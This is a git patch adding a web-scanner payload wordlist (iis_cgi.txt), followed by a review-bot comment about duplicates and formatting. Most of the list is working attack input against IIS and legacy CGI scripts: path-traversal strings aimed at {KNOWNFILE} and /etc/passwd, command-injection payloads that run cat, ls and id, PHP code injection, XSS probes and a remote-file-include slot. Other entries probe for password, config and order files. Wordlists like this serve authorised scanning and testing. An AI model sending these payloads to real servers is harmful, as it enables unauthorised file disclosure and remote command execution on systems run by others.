From af88d04fb42abfe1017c591adf1905389b3a94a7 Mon Sep 17 00:00:00 2001
From: InfoSec <1241112575@qq.com>
Date: Sun, 7 Aug 2016 16:00:09 +0800
Subject: [PATCH] Add files via upload

---
 payloads/directory/iis_cgi.txt | 642 +++++++++++++++++++++++++++++++++
 1 file changed, 642 insertions(+)
 create mode 100644 payloads/directory/iis_cgi.txt

diff --git a/payloads/directory/iis_cgi.txt b/payloads/directory/iis_cgi.txt
new file mode 100644
index 0000000..41fae54
--- /dev/null
+++ b/payloads/directory/iis_cgi.txt
@@ -0,0 +1,642 @@
+/.printer
+/%NETHOOD%/
+/.aspx
+/AccessPlatform/
+/AccessPlatform/auth/
+/AccessPlatform/auth/clientscripts/cookies.js
+/AccessPlatform/auth/clientscripts/login.js
+/Exadmin/
+/ExchWeb/
+/Exchange/
+/Microsoft-Server-ActiveSync/
+/OMA/
+/OWA/
+/Public/
+/_layouts/alllibs.htm
+/_layouts/settings.htm
+/_layouts/userinfo.htm
+/_vti_bin/
+/_vti_bin/_vti_aut/fp30reg.dll
+/_vti_pvt/
+/_WEB_INF/
+/a%5c.aspx
+/adovbs.inc
+/aspnet_files/
+/certcontrol/
+/certenroll/
+/certsrv/
+/citrix/
+/citrix/AccessPlatform/auth/
+/citrix/AccessPlatform/auth/clientscripts/
+/AccessPlatform/auth/clientscripts/
+/Citrix//AccessPlatform/auth/clientscripts/cookies.js
+/Citrix/AccessPlatform/auth/clientscripts/login.js
+/Citrix/PNAgent/config.xml
+/exchange/root.asp
+/forum.asp
+/forum_arc.asp
+/forum_professionnel.asp
+/iisadmin/
+/iisadmpwd/achg.htr
+/iisadmpwd/aexp.htr
+/iisadmpwd/aexp2.htr
+/iisadmpwd/aexp2b.htr
+/iisadmpwd/aexp3.htr
+/iisadmpwd/aexp4.htr
+/iisadmpwd/aexp4b.htr
+/iisadmpwd/anot.htr
+/iisadmpwd/anot3.htr
+/iiasdmpwd/
+/iishelp/
+/iishelp/iis/misc/default.asp
+/iissamples/
+/imprimer.asp
+/includes/adovbs.inc
+/msadc/
+/null.htw
+/pbserver/pbserver.dll
+/postinfo.html
+/rubrique.asp
+/scripts/
+/scripts/fpcount.exe
+/scripts/cgimail.exe
+/scripts/tools/newdsn.exe
+/scripts/tools/getdrvs.exe
+/scripts/convert.bas
+/cgi-bin/htmlscript
+/scripts/counter.exe
+/scripts/no-such-file.pl
+/share/
+/tsweb/
+/~/.asp
+/~/.aspx
+/index.shtml
+/x.htw
+/x.ida
+/x.idq
+/cgi
+/scripts/iisadmin/ism.dll?http/dir
+/scripts/samples/search/webhits.exe
+%2e%2e/abyss.conf
+.access
+.cobalt
+.cobalt/alert/service.cgi?service=
+.cobalt/alert/service.cgi?service=
+.fhp
+.htaccess
+.htaccess.old
+.htaccess.save
+.htaccess~
+.htpasswd
+.nsconfig
+.passwd
+.www_acl
+.wwwacl
+/_vti_pvt/doctodep.btr
+14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}
+14all.cgi?cfg=../../../../../../../..{KNOWNFILE}
+AT-admin.cgi
+AT-generate.cgi
+Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
+AnyBoard.cgi
+AnyForm
+AnyForm2
+Backup/add-passwd.cgi
+C
+Count.cgi
+DC
+DCFORM
+File
+FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
+FormMail.cgi?
+a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
+a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
+a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}
+a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}
+add_ftp.cgi
+addbanner.cgi
+adduser.cgi
+admin.cgi
+admin.cgi?list=../../../../../../../../../..{KNOWNFILE}
+admin.php
+admin.php3
+admin.pl
+adminhot.cgi
+adminwww.cgi
+af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+aglimpse
+aglimpse.cgi
+alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
+alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+amadmin.pl
+anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}
+ans.pl?p=../../../../../usr/bin/id|&blah
+ans/ans.pl?p=../../../../../usr/bin/id|&blah
+anyboard.cgi
+archie
+architext_query.cgi
+architext_query.pl
+ash
+astrocam.cgi
+atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
+auction/auction.cgi?action=
+auctiondeluxe/auction.pl
+auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}
+auth_data/auth_user_file.txt
+awl/auctionweaver.pl
+awstats.pl
+awstats/awstats.pl
+ax-admin.cgi
+ax.cgi
+axs.cgi
+badmin.cgi
+banner.cgi
+bannereditor.cgi
+bash
+bb-hist?HI
+bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+bbs_forum.cgi
+betsie/parserl.pl/;
+bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=
+bizdb1-search.cgi
+blog/
+blog/mt-check.cgi
+blog/mt-load.cgi
+blog/mt.cfg
+bnbform
+bnbform.cgi
+book.cgi?action=default¤t=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10
+boozt/admin/index.cgi?section=5&input=1
+bsguest.cgi?email=x;ls
+bslist.cgi?email=x;ls
+build.cgi
+bulk/bulk.cgi
+c_download.cgi
+cached_feed.cgi
+cachemgr.cgi
+cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00
+calendar
+calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+calendar.pl
+calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|
+calendar/index.cgi
+calendar_admin.pl?config=|cat%20{KNOWNFILE}|
+calender_admin.pl
+campas?%0acat%0a{KNOWNFILE}%0a
+cart.pl
+cart.pl?db='
+cartmanager.cgi
+cbmc/forums.cgi
+ccbill-local.cgi?cmd=MENU
+ccbill-local.pl?cmd=MENU
+cgforum.cgi
+cgi-lib.pl
+cgicso?query=
+cgicso?query=AAA
+cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00
+cgiwrap
+cgiwrap/%3Cfont%20color=red%3E
+cgiwrap/~@U
+cgiwrap/~JUNK(5)
+cgiwrap/~root
+change-your-password.pl
+classified.cgi
+classifieds
+classifieds.cgi
+classifieds/classifieds.cgi
+classifieds/index.cgi
+clickcount.pl?view=test
+clickresponder.pl
+code.php
+code.php3
+com5..........................................................................................................................................................................................................................box
+com5.java
+com5.pl
+commandit.cgi
+commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html
+common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}
+common/listrec.pl
+common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
+compatible.cgi
+count.cgi
+counter-ord
+counterbanner
+counterbanner-ord
+counterfiglet-ord
+counterfiglet/nc/
+cs
+csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
+csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
+csLive
+csNews.cgi
+csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
+csPassword.cgi
+csPassword/csPassword.cgi
+csh
+cstat.pl
+cutecast/members/
+cvsblame.cgi?file=
+cvslog.cgi?file=*&rev=&root=
+cvslog.cgi?file=
+cvsquery.cgi?branch=&file=&date=
+cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week
+cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD
+dansguardian.pl?DENIEDURL=
+dasp/fm_shell.asp
+data/fetch.php?page=
+date
+day5datacopier.cgi
+day5datanotifier.cgi
+db2www/library/document.d2w/show
+db4web_c/dbdirname/{KNOWNFILE}
+db_manager.cgi
+dbman/db.cgi?db=no-db
+dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00
+dcshop/auth_data/auth_user_file.txt
+dcshop/orders/orders.txt
+dfire.cgi
+diagnose.cgi
+dig.cgi
+directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00
+displayTC.pl
+dnewsweb
+donothing
+dose.pl?daily&somefile.txt&|ls|
+download.cgi
+dumpenv.pl
+edit.pl
+empower?DB=whateverwhatever
+emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+enter.cgi
+environ.cgi
+environ.pl
+environ.pl?param1=
+erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
+eshop.pl/seite=;cat%20eshop.pl|
+ex-logger.pl
+excite
+excite;IF
+ezadmin.cgi
+ezboard.cgi
+ezman.cgi
+ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|
+ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1
+ezshopper2/loadpage.cgi
+ezshopper3/loadpage.cgi
+faqmanager.cgi?toc={KNOWNFILE}%00
+faxsurvey?cat%20{KNOWNFILE}
+filemail
+filemail.pl
+finger
+finger.pl
+flexform
+flexform.cgi
+fom.cgi?file=
+fom/fom.cgi?cmd=&file=1&keywords=vulnerable
+formmail
+formmail.cgi
+formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
+formmail.pl
+formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
+formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
+fortune
+ftp.pl
+ftpsh
+gH.cgi
+gbadmin.cgi?action=change_adminpass
+gbadmin.cgi?action=change_automail
+gbadmin.cgi?action=colors
+gbadmin.cgi?action=setup
+gbook/gbook.cgi?_MAILTO=xx;ls
+gbpass.pl
+generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
+generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
+generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1
+getdoc.cgi
+gettransbitmap
+glimpse
+gm-authors.cgi
+gm-cplog.cgi
+gm.cgi
+guestbook.cgi
+guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|
+guestbook.pl
+guestbook/passwd
+handler.cgi
+hitview.cgi
+horde/test.php
+horde/test.php?mode=phpinfo
+hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00
+htgrep?file=index.html&hdr={KNOWNFILE}
+html2chtml.cgi
+html2wml.cgi
+htmlscript?../../../../../../../../../..{KNOWNFILE}
+htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
+htsearch?-c/nonexistant
+htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
+htsearch?exclude=%60{KNOWNFILE}%60
+ibill.pm
+icat
+if/admin/nph-build.cgi
+ikonboard/help.cgi?
+imageFolio.cgi
+imagefolio/admin/admin.cgi
+imagemap
+include/new-visitor.inc.php
+index.js0x70
+index.pl
+info2www
+info2www '(../../../../../../../bin/mail root <{KNOWNFILE}>
+infosrch.cgi
+ion-p?page=../../../../..{KNOWNFILE}
+jailshell
+jj
+journal.cgi?folder=journal.cgi%00
+ksh
+lastlines.cgi?process
+listrec.pl
+loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}
+loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+log-reader.cgi
+log/
+log/nether-log.pl?checkit
+login.cgi
+login.pl
+login.pl?course_id=\
+logit.cgi
+logs.pl
+logs/
+logs/access_log
+logs/error_log
+lookwho.cgi
+ls
+lwgate
+lwgate.cgi
+magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../..{KNOWNFILE}
+mail
+mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00
+mailit.pl
+maillist.cgi
+maillist.pl
+mailnews.cgi
+main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}
+majordomo.pl
+man2html
+mastergate/search.cgi?search=0&search_on=all
+meta.pl
+mgrqcgi
+mini_logger.cgi
+mmstdod.cgi
+moin.cgi?test
+mojo/mojo.cgi
+mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}
+mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}
+mrtg.cgi?cfg=blah
+ms_proxy_auth_query/
+mt-static/
+mt-static/mt-check.cgi
+mt-static/mt-load.cgi
+mt-static/mt.cfg
+mt/
+mt/mt-check.cgi
+mt/mt-load.cgi
+mt/mt.cfg
+multihtml.pl?multi={KNOWNFILE}%00html
+musicqueue.cgi
+myguestbook.cgi?action=view
+namazu.cgi
+nbmember.cgi?cmd=list_all_users
+netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}
+netpad.cgi
+newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}
+nimages.php
+nlog-smb.cgi
+nlog-smb.pl
+non-existent.pl
+noshell
+nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+nph-error.pl
+nph-exploitscanget.cgi
+nph-maillist.pl
+nph-publish
+nph-publish.cgi
+nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
+nph-test-cgi
+ntitar.pl
+opendir.php?{KNOWNFILE}
+orders/orders.txt
+pagelog.cgi
+pals-cgi?palsAction=restart&documentName={KNOWNFILE}
+parse-file
+pass
+passwd
+passwd.txt
+password
+pbcgi.cgi?name=Joe%Camel&email=%3C
+perl
+perl?-v
+perlshop.cgi
+pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
+pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}
+pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
+phf
+phf.cgi?QALIA
+phf?Qname=root%0Acat%20{KNOWNFILE}%20
+photo/
+photo/manage.cgi
+photo/protected/manage.cgi
+php-cgi
+php.cgi?{KNOWNFILE}
+plusmail
+pollit/Poll_It_
+pollssi.cgi
+post-query
+post_query
+postcards.cgi
+powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
+printenv
+printenv.tmp
+probecontrol.cgi?command=enable&username=cancer&password=killer
+processit.pl
+profile.cgi
+pu3.pl
+publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10
+query
+query?mss=%2e%2e/config
+quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=
+quikstore.cfg
+quizme.cgi
+r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
+ratlog.cgi
+redirect
+register.cgi
+replicator/webpage.cgi/
+responder.cgi
+retrieve_password.pl
+rksh
+rmp_query
+robadmin.cgi
+robpoll.cgi
+rpm_query
+rsh
+rtm.log
+rwcgi60
+rwcgi60/showenv
+rwwwshell.pl
+sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1
+sawmill?rfcf+%22
+sbcgi/sitebuilder.cgi
+scoadminreg.cgi
+scripts/*%0a.pl
+search.cgi
+search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
+search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+search.php?searchstring=
+search.pl
+search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=
+search.pl?form=../../../../../../../../../..{KNOWNFILE}%00
+search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
+sendform.cgi
+sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
+sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}
+session/adminlogin
+sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}
+sh
+shop.cgi?page=../../../../../../..{KNOWNFILE}
+shop.pl/page=;cat%20shop.pl|
+shop/auth_data/auth_user_file.txt
+shop/orders/orders.txt
+shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}
+shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|
+show.pl
+showcheckins.cgi?person=
+showuser.cgi
+simple/view_page?mv_arg=|cat%20{KNOWNFILE}|
+simplestguest.cgi
+simplestmail.cgi
+smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
+smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
+sojourn.cgi?cat=../../../../../../../../../../etc/password%00
+spin_client.cgi?aaaaaaaa
+ss
+sscd_suncourier.pl
+ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}
+start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
+stat.pl
+stat/
+stats-bin-p/reports/index.html
+stats.pl
+stats.prf
+stats/
+stats/statsbrowse.asp?filepath=c:\&Opt=3
+stats_old/
+statsconfig
+statusconfig.pl
+statview.pl
+store.cgi?
+store/agora.cgi?cart_id=
+store/agora.cgi?page=whatever33.html
+store/index.cgi?page=../../../../../../../..{KNOWNFILE}
+story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
+story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
+survey
+survey.cgi
+sws/admin.html
+sws/manager.pl
+tablebuild.pl
+talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1
+tcsh
+technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}
+test-cgi.tcl
+test-cgi?/*
+test-env
+test.cgi
+test/test.cgi
+texis/junk
+texis/phine
+textcounter.pl
+tidfinder.cgi
+tigvote.cgi
+title.cgi
+tpgnrock
+traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}
+troops.cgi
+ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}
+ultraboard.cgi
+ultraboard.pl
+unlg1.1
+unlg1.2
+update.dpgs
+upload.cgi
+uptime
+urlcount.cgi?%3CIMG%20
+ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}
+utm/admin
+utm/utm_stat
+view-source
+view-source?view-source
+view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00
+viewcvs.cgi/viewcvs/?cvsroot=
+viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
+viewlogs.pl
+viewsource?{KNOWNFILE}
+viralator.cgi
+virgil.cgi
+vote.cgi
+vpasswd.cgi
+vq/demos/respond.pl?
+w3-msql
+w3-sql
+wais.pl
+way-board.cgi?db={KNOWNFILE}%00
+way-board/way-board.cgi?db={KNOWNFILE}%00
+webais
+webbbs.cgi
+webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}
+webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
+webdist.cgi?distloc=;cat%20{KNOWNFILE}
+webdriver
+webgais
+webif.cgi
+webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+webmap.cgi
+webnews.pl
+webplus?about
+webplus?script=../../../../../../../../../..{KNOWNFILE}
+websendmail
+webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}
+webutil.pl
+webutils.pl
+webwho.pl
+where.pl?sd=ls%20/etc
+whois.cgi?action=load&whois=%3Bid
+whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
+whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
+whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}
+windmail
+wrap
+wrap.cgi
+ws_ftp.ini
+www-sql
+wwwadmin.pl
+wwwboard.cgi.cgi
+wwwboard.pl
+wwwstats.pl
+wwwthreads/3tvars.pm
+wwwthreads/w3tvars.pm
+wwwwais
+zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00
+zsh
\ No newline at end of file
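Review bot: The new list carries an exact duplicate near the top of the hunk, `.cobalt/alert/service.cgi?service=` appears on two consecutive lines, and the file is committed without a trailing newline (`\ No newline at end of file`), so a line-oriented reader may handle the final entry `zsh` differently from the rest. Entries also mix a leading slash (`/iisadmin/`, `/scripts/`) with none (`admin.cgi`, `passwd`), and the `{KNOWNFILE}` token is used throughout without anything in this patch saying what substitutes for it; the consumer of this file is not visible here, so whether it normalises the prefix or expands the token is inferred. I would dedupe the list, settle on one leading-slash convention, describe the `{KNOWNFILE}` placeholder in the `payloads/directory/` README since a plain wordlist has no comment syntax, and end the file with a newline.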